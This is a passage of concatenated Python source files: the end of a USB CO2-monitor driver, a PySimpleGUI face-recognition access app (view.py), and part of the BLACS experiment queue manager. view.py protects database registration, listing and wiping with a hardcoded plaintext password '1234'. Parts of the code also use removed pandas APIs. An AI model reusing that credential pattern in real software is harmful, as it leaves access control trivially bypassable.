'library "hid" is instlled and if so - uninstall it, '
'keeping only "hidapi".' % str(e)))
else:
raise
import datetime as dt
from contextlib import contextmanager
import threading
import time
import os
plt = None # To be imported on demand only
try:
import pandas as pd
except ImportError:
pd = None
_CO2MON_HID_VENDOR_ID = 0x04d9
_CO2MON_HID_PRODUCT_ID = 0xa052
_CO2MON_MAGIC_WORD = b'Htemp99e'
_CO2MON_MAGIC_TABLE = (0, 0, 0, 0, 0, 0, 0, 0)
_CODE_END_MESSAGE = 0x0D
_CODE_CO2 = 0x50
_CODE_TEMPERATURE = 0x42
_COLORS = {'r': (0.86, 0.37, 0.34),
'g': (0.56, 0.86, 0.34),
'b': 'b'}
CO2_HIGH = 1200
CO2_LOW = 800
#############################################################################
def now():
return dt.datetime.now().replace(microsecond=0)
#############################################################################
def list_to_longint(x):
return sum([val << (i * 8) for i, val in enumerate(x[::-1])])
#############################################################################
def longint_to_list(x):
return [(x >> i) & 0xFF for i in (56, 48, 40, 32, 24, 16, 8, 0)]
#############################################################################
def convert_temperature(val):
""" Convert temperature from Kelvin (unit of 1/16th K) to Celsius
"""
return val * 0.0625 - 273.15
#############################################################################
# Class to operate with CO2 monitor
#############################################################################
class CO2monitor:
def __init__(self):
""" Initialize the CO2monitor object and retrieve basic HID info.
"""
self._info = {'vendor_id': _CO2MON_HID_VENDOR_ID,
'product_id': _CO2MON_HID_PRODUCT_ID}
self._h = hid.device()
# Number of requests to open connection
self._status = 0
self._magic_word = [((w << 4) & 0xFF) | (w >> 4)
for w in bytearray(_CO2MON_MAGIC_WORD)]
self._magic_table = _CO2MON_MAGIC_TABLE
self._magic_table_int = list_to_longint(_CO2MON_MAGIC_TABLE)
# Initialisation of continuous monitoring
if pd is None:
self._data = []
else:
self._data = pd.DataFrame()
self._keep_monitoring = False
self._interval = 10
# Device info
with self.co2hid():
self._info['manufacturer'] = self._h.get_manufacturer_string()
self._info['product_name'] = self._h.get_product_string()
self._info['serial_no'] = self._h.get_serial_number_string()
#########################################################################
def hid_open(self, send_magic_table=True):
""" Open connection to HID device. If connection is already open,
then only the counter of requests is incremented (so hid_close()
knows how many sub-processes keep the HID handle)
Parameters
----------
send_magic_table : bool
If True then the internal "magic table" will be sent to
the device (it is used for decryption)
"""
if self._status == 0:
# If connection was not opened before
self._h.open(self._info['vendor_id'], self._info['product_id'])
if send_magic_table:
self._h.send_feature_report(self._magic_table)
self._status += 1
def hid_close(self, force=False):
""" Close connection to HID device. If there were several hid_open()
attempts then the connection will be closed only after respective
number of calls to hid_close() method
Parameters
----------
force : bool
Force-close of connection irrespectively of the counter of
open requests
"""
if force:
self._status = 0
elif self._status > 0:
self._status -= 1
if self._status == 0:
self._h.close()
def hid_read(self):
""" Read 8-byte string from HID device """
msg = self._h.read(8)
return self._decrypt(msg)
@contextmanager
def co2hid(self, send_magic_table=True):
self.hid_open(send_magic_table=send_magic_table)
try:
yield
finally:
self.hid_close()
#########################################################################
@property
def info(self):
""" Device info """
return self._info
@property
def is_alive(self):
""" If the device is still connected """
try:
with self.co2hid(send_magic_table=True):
return True
except:
return False
#########################################################################
def _decrypt(self, message):
""" Decode message received from CO2 monitor.
"""
# Rearrange message and convert to long int
msg = list_to_longint([message[i] for i in [2, 4, 0, 7, 1, 6, 5, 3]])
# XOR with magic_table
res = msg ^ self._magic_table_int
# Cyclic shift by 3 to the right
res = (res >> 3) | ((res << 61) & 0xFFFFFFFFFFFFFFFF)
# Convert to list
res = longint_to_list(res)
# Subtract and convert to uint8
res = [(r - mw) & 0xFF for r, mw in zip(res, self._magic_word)]
return res
@staticmethod
def decode_message(msg):
""" Decode value from the decrypted message
Parameters
----------
msg : list
Decrypted message retrieved with hid_read() method
Returns
-------
CntR : int
CO2 concentration in ppm
Tamb : float
Temperature in Celsius
"""
# Expected 3 zeros at the end
bad_msg = (msg[5] != 0) or (msg[6] != 0) or (msg[7] != 0)
# End of message should be 0x0D
bad_msg |= msg[4] != _CODE_END_MESSAGE
# Check sum: LSB of sum of first 3 bytes
bad_msg |= (sum(msg[:3]) & 0xFF) != msg[3]
if bad_msg:
return None, None
value = (msg[1] << 8) | msg[2]
if msg[0] == _CODE_CO2: # CO2 concentration in ppm
return int(value), None
elif msg[0] == _CODE_TEMPERATURE: # Temperature in Celsius
return None, convert_temperature(value)
else: # Other codes - so far not decoded
return None, None
def _read_co2_temp(self, max_requests=50):
""" Read one pair of values from the device.
HID device should be open before
"""
co2, temp = None, None
for ii in range(max_requests):
_co2, _temp = self.decode_message(self.hid_read())
if _co2 is not None:
co2 = _co2
if _temp is not None:
temp = _temp
if (co2 is not None) and (temp is not None):
break
return now(), co2, temp
#########################################################################
def read_data_raw(self, max_requests=50):
with self.co2hid(send_magic_table=True):
vals = self._read_co2_temp(max_requests=max_requests)
self._last_data = vals
return vals
def read_data(self, max_requests=50):
""" Listen to values from device and retrieve temperature and CO2.
Parameters
----------
max_requests : int
Effective timeout: number of attempts after which None is returned
Returns
-------
tuple (timestamp, co2, temperature)
or
pandas.DataFrame indexed with timestamp
Results of measurements
"""
if self._keep_monitoring:
if pd is None:
return self._data[-1]
else:
return self._data.iloc[[-1]]
else:
vals = self.read_data_raw(max_requests=max_requests)
# If pandas is available - return pandas.DataFrame
if pd is not None:
vals = pd.DataFrame({'co2': vals[1], 'temp': vals[2]},
index=[vals[0]])
return vals
#########################################################################
def _monitoring(self):
""" Private function for continuous monitoring.
"""
with self.co2hid(send_magic_table=True):
while self._keep_monitoring:
vals = self._read_co2_temp(max_requests=1000)
if pd is None:
self._data.append(vals)
else:
vals = pd.DataFrame({'co2': vals[1], 'temp': vals[2]},
index=[vals[0]])
self._data = self._data.append(vals)
time.sleep(self._interval)
def start_monitoring(self, interval=5):
""" Start continuous monitoring of the values and collecting them
in the list / pandas.DataFrame.
The monitoring is started in a separate thread, so the current
interpreter session is not blocked.
Parameters
----------
interval : float
Interval in seconds between consecutive data reads
"""
self._interval = interval
if self._keep_monitoring:
# If already started then we should not start a new thread
return
self._keep_monitoring = True
t = threading.Thread(target=self._monitoring)
t.start()
def stop_monitoring(self):
""" Stop continuous monitoring
"""
self._keep_monitoring = False
#########################################################################
@property
def data(self):
""" All data retrieved with continuous monitoring
"""
return self._data
def log_data_to_csv(self, fname):
""" Log data retrieved with continuous monitoring to CSV file. If the
file already exists, then it will be appended.
Note, that the method requires pandas package (so far alternative
is not implemented).
Parameters
----------
fname : string
Filename
"""
if pd is None:
raise NotImplementedError('Logging to CSV is implemented '
'using pandas package only (so far)')
if os.path.isfile(fname):
# Check the last line to get the timestamp of the last record
df = pd.read_csv(fname)
last = pd.Timestamp(df.iloc[-1, 0])
# Append only new data
with open(fname, 'a') as f:
self._data[self._data.index > last].to_csv(f, header=False)
else:
self._data.to_csv(fname)
#############################################################################
def read_csv(fname):
""" Read data from CSV file.
Parameters
----------
fname : string
Filename
"""
if pd is None:
raise NotImplementedError('Reading CSV files is implemented '
'using pandas package only (so far)')
return pd.read_csv(fname, index_col=0, parse_dates=0)
#############################################################################
def plot(data, plot_temp=False, ewma_halflife=30., **kwargs):
""" Plot recorded data
Parameters
----------
data : pandas.DataFrame
Data indexed by timestamps. Should have columns 'co2' and 'temp'
plot_temp : bool
If True temperature will be also plotted
ewma_halflife : float
If specified (not None) data will be smoothed using EWMA
"""
global plt
if plt is None:
import matplotlib.pyplot as _plt
plt = _plt
if pd is None:
raise NotImplementedError('Plotting is implemented so far '
'using pandas package only')
# DataFrames
if (ewma_halflife is not None) and (ewma_halflife > 0):
halflife = pd.Timedelta(ewma_halflife, 's') / pd.np.mean(pd.np.diff(data.index))
co2 = pd.ewma(data.co2, halflife=halflife, min_periods=0)
temp = pd.ewma(data.temp, halflife=2 * halflife, min_periods=0)
else:
co2 = data.co2
temp = data.temp
co2_r = co2.copy()
co2_g = co2.copy()
co2_r[co2_r <= CO2_HIGH] = pd.np.NaN
co2_g[co2_g >= CO2_LOW] = pd.np.NaN
# Plotting
ax = kwargs.pop('ax', plt.gca())
ax.fill_between(co2_r.index, co2_r.values, CO2_HIGH,
alpha=0.5, color=_COLORS['r'])
ax.fill_between(co2_g.index, co2_g.values, CO2_LOW,
alpha=0.5, color=_COLORS['g'])
ax.axhline(CO2_LOW, color=_COLORS['g'], lw=2, ls='--')
ax.axhline(CO2_HIGH, color=_COLORS['r'], lw=2, ls='--')
ax.plot(co2.index, co2.values, lw=2, color='k')
yl = ax.get_ylim()
ax.set_ylim([min(600, yl[0]), max(1400, yl[1])])
ax.set_ylabel('CO2 concentration, ppm')
plt.setp(ax.xaxis.get_majorticklabels(), rotation=0,
horizontalalignment='center')
if plot_temp:
ax2 = ax.twinx()
ax2.plot(temp.index, temp.values, color=_COLORS['b'])
ax2.set_ylabel('Temperature, C')
yl = ax2.get_ylim()
ax2.set_ylim([min(19, yl[0]), max(23, yl[1])])
ax2.grid('off')
plt.tight_layout()
#############################################################################
# Entry points
#############################################################################
def start_homekit():
from .homekit import start_homekit as start
start()
def start_server():
from .server import start_server as start
start()
def start_server_homekit():
from .server import start_server_homekit as start
start()
|
view.py | import sys
import time
import cv2
import threading
import PySimpleGUI as sg
from viewcontroller import wipe_database, face_detection, register, verify, get_registered
from utils.constants import ACCESS_DENIED, ACCESS_GRANTED, DB_ACCESS_DENIED, TITLE, SUCCESS, FAIL, NO_FACE, DB_ACCESS_GRANTED, KEEP_IN_FRAME, LOGO, CLOSE_APP, WAIT_CLOSE_APP
def init_window():
''' define the window layout and return created window'''
sg.theme('Reddit')
layout = [
[sg.Image(filename='', key='logo'), sg.Text(TITLE, size=(20, 1), justification='center', font='OpenSans-ExtraBold 34', text_color="#666666")],
[sg.Button('Register New Person', button_color = ('white', '#6DBCFC'), size=(23, 1), font='OpenSans-Regular 18'),
sg.Button('Database', button_color = ('white', '#6DBCFC'), size=(23, 1), font='OpenSans-Regular 18'),
sg.Button('Clear Database', button_color = ('white', '#6DBCFC'), size=(23, 1), font='OpenSans-Regular 18')],
[sg.Image(filename='', key='image')],
[sg.Text('', key='-TEXT-', justification='center', background_color='#6DBCFC', size=(42, 1), font='OpenSans-ExtraBold 31')]
]
window = sg.Window('fasecure - Face Recognition', layout, location=(0, 0))
return window
def update_detect_label(text, bg_color, new_box_color):
'''Update label whether the face has been recognized'''
global box_color
global window
window['-TEXT-'].update(text)
window['-TEXT-'].update(background_color=bg_color)
box_color = new_box_color
def thread_verify(frame, start_x, start_y, end_x, end_y):
'''Face recognition run on separate thread'''
global box_color
if start_x:
closest_label, check = verify(frame, start_x, start_y, end_x, end_y)
if check == "out of frame":
update_detect_label(KEEP_IN_FRAME, '#F63E3E', (0, 0, 255))
elif check:
update_detect_label(ACCESS_GRANTED + closest_label, '#56E87C', (86, 232, 124))
else:
update_detect_label(ACCESS_DENIED, '#F63E3E', (0, 0, 255))
else:
update_detect_label(ACCESS_DENIED, '#F63E3E', (0, 0, 255))
def fps(frame, prev_frame_time):
'''Display framerate'''
new_frame_time = time.time()
framerate = 1 / (new_frame_time - prev_frame_time)
prev_frame_time = new_frame_time
framerate = str(int(framerate))
cv2.putText(frame, framerate, (7, 70), cv2.FONT_HERSHEY_SIMPLEX, 3, (100, 255, 0), 3, cv2.LINE_AA)
return frame, prev_frame_time
def show_webcam(frame):
'''Display webcam image'''
global window
frame_resized = cv2.resize(frame, (1010, 570))
img_bytes = cv2.imencode('.png', frame_resized)[1].tobytes()
window['image'].update(data=img_bytes)
def main():
global box_color
global window
cap = cv2.VideoCapture(0)
t = 15
set_logo = True
prev_frame_time = 0
while True:
event, values = window.read(timeout=20)
if set_logo:
logo = cv2.imread(LOGO)
logo_resized = cv2.resize(logo, (225, 200))
img_bytes = cv2.imencode('.png', logo_resized)[1].tobytes()
window['logo'].update(data=img_bytes)
set_logo = False
_, frame = cap.read()
h, w = frame.shape[:2]
start_x, start_y, end_x, end_y, frame = face_detection(frame, h, w, box_color)
frame, prev_frame_time = fps(frame, prev_frame_time)
show_webcam(frame)
if t % 10 == 0:
# Face recognition
if start_x:
try:
_worker = threading.Thread(target=thread_verify, args=(frame, start_x, start_y, end_x, end_y))
_worker.start()
except:
print("Thread error")
if event == 'Register New Person':
if start_x:
password_dialog = sg.popup_get_text('Password for autenthication required', 'Autenthication', password_char='*')
if password_dialog == password:
print(DB_ACCESS_GRANTED)
label = sg.popup_get_text('Name', 'Registration')
response = register(frame, start_x, start_y, end_x, end_y, label)
if response != 0:
print(FAIL)
else:
print(DB_ACCESS_DENIED)
else:
print(NO_FACE)
elif event == 'Database':
password_dialog = sg.popup_get_text('Password for autenthication required', 'Autenthication', password_char='*')
if password_dialog == password:
list_names = get_registered()
print(DB_ACCESS_GRANTED)
if list_names:
for i in list_names:
sg.Print(i)
else:
print(DB_ACCESS_DENIED)
elif event == 'Clear Database':
password_dialog = sg.popup_get_text('Password for autenthication required', 'Autenthication', password_char='*')
if password_dialog == password:
print(DB_ACCESS_GRANTED)
response = wipe_database()
if response != 0:
print(FAIL)
else:
print(SUCCESS)
else:
print(DB_ACCESS_DENIED)
elif event == 'Exit System' or event == sg.WIN_CLOSED:
print(WAIT_CLOSE_APP)
time.sleep(2) # wait for face verficiation thread to finish
print(CLOSE_APP)
cap.release()
break
t += 1
window.close()
password = "1234"
box_color = (252, 188, 109)
window = init_window()
if __name__ == '__main__':
main()
sys.exit(0)
|
experiment_queue.py | #####################################################################
# #
# /experiment_queue.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
if PY2:
str = unicode
import Queue as queue
else:
import queue
import logging
import os
import platform
import threading
import time
import sys
import shutil
from collections import defaultdict
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
import zprocess
from labscript_utils.ls_zprocess import ProcessTree
process_tree = ProcessTree.instance()
import labscript_utils.h5_lock, h5py
from qtutils import *
from labscript_utils.qtwidgets.elide_label import elide_label
from labscript_utils.connections import ConnectionTable
import labscript_utils.properties
from blacs.tab_base_classes import MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL, MODE_BUFFERED
import blacs.plugins as plugins
FILEPATH_COLUMN = 0
class QueueTreeview(QTreeView):
def __init__(self,*args,**kwargs):
QTreeView.__init__(self,*args,**kwargs)
self.header().setStretchLastSection(True)
self.setAutoScroll(False)
self.add_to_queue = None
self.delete_selection = None
self._logger = logging.getLogger('BLACS.QueueManager')
def keyPressEvent(self,event):
if event.key() == Qt.Key_Delete:
event.accept()
if self.delete_selection:
self.delete_selection()
QTreeView.keyPressEvent(self,event)
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
event.accept()
else:
event.ignore()
def dragMoveEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
else:
event.ignore()
def dropEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
for url in event.mimeData().urls():
path = str(url.toLocalFile())
if path.endswith('.h5') or path.endswith('.hdf5'):
self._logger.info('Acceptable file dropped. Path is %s'%path)
if self.add_to_queue:
self.add_to_queue(str(path))
else:
self._logger.info('Dropped file not added to queue because there is no access to the neccessary add_to_queue method')
else:
self._logger.info('Invalid file dropped. Path was %s'%path)
else:
event.ignore()
class QueueManager(object):
REPEAT_ALL = 0
REPEAT_LAST = 1
ICON_REPEAT = ':qtutils/fugue/arrow-repeat'
ICON_REPEAT_LAST = ':qtutils/fugue/arrow-repeat-once'
def __init__(self, BLACS, ui):
self._ui = ui
self.BLACS = BLACS
self.last_opened_shots_folder = BLACS.exp_config.get('paths', 'experiment_shot_storage')
self._manager_running = True
self._manager_paused = False
self._manager_repeat = False
self._manager_repeat_mode = self.REPEAT_ALL
self.master_pseudoclock = self.BLACS.connection_table.master_pseudoclock
self._logger = logging.getLogger('BLACS.QueueManager')
# Create listview model
self._model = QStandardItemModel()
self._create_headers()
self._ui.treeview.setModel(self._model)
self._ui.treeview.add_to_queue = self.process_request
self._ui.treeview.delete_selection = self._delete_selected_items
# set up buttons
self._ui.queue_pause_button.toggled.connect(self._toggle_pause)
self._ui.queue_repeat_button.toggled.connect(self._toggle_repeat)
self._ui.queue_delete_button.clicked.connect(self._delete_selected_items)
self._ui.queue_clear_button.clicked.connect(self._toggle_clear)
self._ui.actionAdd_to_queue.triggered.connect(self.on_add_shots_triggered)
self._ui.queue_add_button.setDefaultAction(self._ui.actionAdd_to_queue)
self._ui.queue_push_up.clicked.connect(self._move_up)
self._ui.queue_push_down.clicked.connect(self._move_down)
self._ui.queue_push_to_top.clicked.connect(self._move_top)
self._ui.queue_push_to_bottom.clicked.connect(self._move_bottom)
# Set the elision of the status labels:
elide_label(self._ui.queue_status, self._ui.queue_status_verticalLayout, Qt.ElideRight)
elide_label(self._ui.running_shot_name, self._ui.queue_status_verticalLayout, Qt.ElideLeft)
# Set up repeat mode button menu:
self.repeat_mode_menu = QMenu(self._ui)
self.action_repeat_all = QAction(QIcon(self.ICON_REPEAT), 'Repeat all', self._ui)
self.action_repeat_last = QAction(QIcon(self.ICON_REPEAT_LAST), 'Repeat last', self._ui)
self.action_repeat_all.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_ALL))
self.action_repeat_last.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_LAST))
self.repeat_mode_menu.addAction(self.action_repeat_all)
self.repeat_mode_menu.addAction(self.action_repeat_last)
self._ui.repeat_mode_select_button.setMenu(self.repeat_mode_menu)
# The button already has an arrow indicating a menu, don't draw another one:
self._ui.repeat_mode_select_button.setStyleSheet("QToolButton::menu-indicator{width: 0;}")
self.manager = threading.Thread(target = self.manage)
self.manager.daemon=True
self.manager.start()
def _create_headers(self):
self._model.setHorizontalHeaderItem(FILEPATH_COLUMN, QStandardItem('Filepath'))
def get_save_data(self):
# get list of files in the queue
file_list = []
for i in range(self._model.rowCount()):
file_list.append(self._model.item(i).text())
# get button states
return {'manager_paused':self.manager_paused,
'manager_repeat':self.manager_repeat,
'manager_repeat_mode':self.manager_repeat_mode,
'files_queued':file_list,
'last_opened_shots_folder': self.last_opened_shots_folder
}
def restore_save_data(self,data):
if 'manager_paused' in data:
self.manager_paused = data['manager_paused']
if 'manager_repeat' in data:
self.manager_repeat = data['manager_repeat']
if 'manager_repeat_mode' in data:
self.manager_repeat_mode = data['manager_repeat_mode']
if 'files_queued' in data:
file_list = list(data['files_queued'])
self._model.clear()
self._create_headers()
for file in file_list:
self.process_request(str(file))
if 'last_opened_shots_folder' in data:
self.last_opened_shots_folder = data['last_opened_shots_folder']
@property
@inmain_decorator(True)
def manager_running(self):
return self._manager_running
@manager_running.setter
@inmain_decorator(True)
def manager_running(self,value):
value = bool(value)
self._manager_running = value
def _toggle_pause(self,checked):
self.manager_paused = checked
def _toggle_clear(self):
self._model.clear()
self._create_headers()
@property
@inmain_decorator(True)
def manager_paused(self):
return self._manager_paused
@manager_paused.setter
@inmain_decorator(True)
def manager_paused(self,value):
value = bool(value)
self._manager_paused = value
if value != self._ui.queue_pause_button.isChecked():
self._ui.queue_pause_button.setChecked(value)
def _toggle_repeat(self,checked):
self.manager_repeat = checked
@property
@inmain_decorator(True)
def manager_repeat(self):
return self._manager_repeat
@manager_repeat.setter
@inmain_decorator(True)
def manager_repeat(self,value):
value = bool(value)
self._manager_repeat = value
if value != self._ui.queue_repeat_button.isChecked():
self._ui.queue_repeat_button.setChecked(value)
@property
@inmain_decorator(True)
def manager_repeat_mode(self):
return self._manager_repeat_mode
@manager_repeat_mode.setter
@inmain_decorator(True)
def manager_repeat_mode(self, value):
assert value in [self.REPEAT_LAST, self.REPEAT_ALL]
self._manager_repeat_mode = value
button = self._ui.queue_repeat_button
if value == self.REPEAT_ALL:
button.setIcon(QIcon(self.ICON_REPEAT))
elif value == self.REPEAT_LAST:
button.setIcon(QIcon(self.ICON_REPEAT_LAST))
def on_add_shots_triggered(self):
shot_files = QFileDialog.getOpenFileNames(self._ui, 'Select shot files',
self.last_opened_shots_folder,
"HDF5 files (*.h5)")
if isinstance(shot_files, tuple):
shot_files, _ = shot_files
if not shot_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_files = [os.path.abspath(str(shot_file)) for shot_file in shot_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_shots_folder = os.path.dirname(shot_files[0])
# Queue the files to be opened:
for filepath in shot_files:
if filepath.endswith('.h5'):
self.process_request(str(filepath))
def _delete_selected_items(self):
index_list = self._ui.treeview.selectedIndexes()
while index_list:
self._model.takeRow(index_list[0].row())
index_list = self._ui.treeview.selectedIndexes()
def _move_up(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
def _move_down(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
if row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
def _move_top(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
def _move_bottom(self):
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
while row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
@inmain_decorator(True)
def append(self, h5files):
for file in h5files:
item = QStandardItem(file)
item.setToolTip(file)
self._model.appendRow(item)
@inmain_decorator(True)
def prepend(self,h5file):
if not self.is_in_queue(h5file):
self._model.insertRow(0,QStandardItem(h5file))
def process_request(self,h5_filepath):
# check connection table
try:
new_conn = ConnectionTable(h5_filepath, logging_prefix='BLACS')
except Exception:
return "H5 file not accessible to Control PC\n"
result,error = inmain(self.BLACS.connection_table.compare_to,new_conn)
if result:
# Has this run file been run already?
with h5py.File(h5_filepath) as h5_file:
if 'data' in h5_file['/']:
rerun = True
else:
rerun = False
if rerun or self.is_in_queue(h5_filepath):
self._logger.debug('Run file has already been run! Creating a fresh copy to rerun')
new_h5_filepath, repeat_number = self.new_rep_name(h5_filepath)
# Keep counting up until we get a filename that isn't in the filesystem:
while os.path.exists(new_h5_filepath):
new_h5_filepath, repeat_number = self.new_rep_name(new_h5_filepath)
success = self.clean_h5_file(h5_filepath, new_h5_filepath, repeat_number=repeat_number)
if not success:
return 'Cannot create a re run of this experiment. Is it a valid run file?'
self.append([new_h5_filepath])
message = "Experiment added successfully: experiment to be re-run\n"
else:
self.append([h5_filepath])
message = "Experiment added successfully\n"
if self.manager_paused:
message += "Warning: Queue is currently paused\n"
if not self.manager_running:
message = "Error: Queue is not running\n"
return message
else:
# TODO: Parse and display the contents of "error" in a more human readable format for analysis of what is wrong!
message = ("Connection table of your file is not a subset of the experimental control apparatus.\n"
"You may have:\n"
" Submitted your file to the wrong control PC\n"
" Added new channels to your h5 file, without rewiring the experiment and updating the control PC\n"
" Renamed a channel at the top of your script\n"
" Submitted an old file, and the experiment has since been rewired\n"
"\n"
"Please verify your experiment script matches the current experiment configuration, and try again\n"
"The error was %s\n"%error)
return message
def new_rep_name(self, h5_filepath):
basename, ext = os.path.splitext(h5_filepath)
if '_rep' in basename and ext == '.h5':
reps = basename.split('_rep')[-1]
try:
reps = int(reps)
except ValueError:
# not a rep
pass
else:
return ''.join(basename.split('_rep')[:-1]) + '_rep%05d.h5' % (reps + 1), reps + 1
return basename + '_rep%05d.h5' % 1, 1
def clean_h5_file(self, h5file, new_h5_file, repeat_number=0):
try:
with h5py.File(h5file,'r') as old_file:
with h5py.File(new_h5_file,'w') as new_file:
groups_to_copy = ['devices', 'calibrations', 'script', 'globals', 'connection table',
'labscriptlib', 'waits', 'time_markers']
for group in groups_to_copy:
if group in old_file:
new_file.copy(old_file[group], group)
for name in old_file.attrs:
new_file.attrs[name] = old_file.attrs[name]
new_file.attrs['run repeat'] = repeat_number
except Exception as e:
#raise
self._logger.exception('Clean H5 File Error.')
return False
return True
@inmain_decorator(wait_for_return=True)
def is_in_queue(self,path):
item = self._model.findItems(path,column=FILEPATH_COLUMN)
if item:
return True
else:
return False
@inmain_decorator(wait_for_return=True)
def set_status(self, queue_status, shot_filepath=None):
self._ui.queue_status.setText(str(queue_status))
if shot_filepath is not None:
self._ui.running_shot_name.setText('<b>%s</b>'% str(os.path.basename(shot_filepath)))
else:
self._ui.running_shot_name.setText('')
@inmain_decorator(wait_for_return=True)
def get_status(self):
return self._ui.queue_status.text()
@inmain_decorator(wait_for_return=True)
def get_next_file(self):
return str(self._model.takeRow(0)[0].text())
@inmain_decorator(wait_for_return=True)
def transition_device_to_buffered(self, name, transition_list, h5file, restart_receiver):
tab = self.BLACS.tablist[name]
if self.get_device_error_state(name,self.BLACS.tablist):
return False
tab.connect_restart_receiver(restart_receiver)
tab.transition_to_buffered(h5file,self.current_queue)
transition_list[name] = tab
return True
@inmain_decorator(wait_for_return=True)
def get_device_error_state(self,name,device_list):
return device_list[name].error_message
def manage(self):
logger = logging.getLogger('BLACS.queue_manager.thread')
process_tree.zlock_client.set_thread_name('queue_manager')
# While the program is running!
logger.info('starting')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
# This name stores the queue currently being used to
# communicate with tabs, so that abort signals can be put
# to it when those tabs never respond and are restarted by
# the user.
self.current_queue = queue.Queue()
#TODO: put in general configuration
timeout_limit = 300 #seconds
self.set_status("Idle")
while self.manager_running:
# If the pause button is pushed in, sleep
if self.manager_paused:
if self.get_status() == "Idle":
logger.info('Paused')
self.set_status("Queue paused")
time.sleep(1)
continue
# Get the top file
try:
path = self.get_next_file()
self.set_status('Preparing shot...', path)
logger.info('Got a file: %s'%path)
except:
# If no files, sleep for 1s,
self.set_status("Idle")
time.sleep(1)
continue
devices_in_use = {}
transition_list = {}
start_time = time.time()
self.current_queue = queue.Queue()
# Function to be run when abort button is clicked
def abort_function():
try:
# Set device name to "Queue Manager" which will never be a labscript device name
# as it is not a valid python variable name (has a space in it!)
self.current_queue.put(['Queue Manager', 'abort'])
except Exception:
logger.exception('Could not send abort message to the queue manager')
def restart_function(device_name):
try:
self.current_queue.put([device_name, 'restart'])
except Exception:
logger.exception('Could not send restart message to the queue manager for device %s'%device_name)
##########################################################################################################################################
# transition to buffered #
##########################################################################################################################################
try:
# A Queue for event-based notification when the tabs have
# completed transitioning to buffered:
timed_out = False
error_condition = False
abort = False
restarted = False
self.set_status("Transitioning to buffered...", path)
# Enable abort button, and link in current_queue:
inmain(self._ui.queue_abort_button.clicked.connect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,True)
with h5py.File(path, 'r') as hdf5_file:
devices_in_use = {}
start_order = {}
stop_order = {}
for name in hdf5_file['devices']:
device_properties = labscript_utils.properties.get(
hdf5_file, name, 'device_properties'
)
devices_in_use[name] = self.BLACS.tablist[name]
start_order[name] = device_properties.get('start_order', None)
stop_order[name] = device_properties.get('start_order', None)
# Sort the devices into groups based on their start_order and stop_order
start_groups = defaultdict(set)
stop_groups = defaultdict(set)
for name in devices_in_use:
start_groups[start_order[name]].add(name)
stop_groups[stop_order[name]].add(name)
while (transition_list or start_groups) and not error_condition:
if not transition_list:
# Ready to transition the next group:
for name in start_groups.pop(min(start_groups)):
try:
# Connect restart signal from tabs to current_queue and transition the device to buffered mode
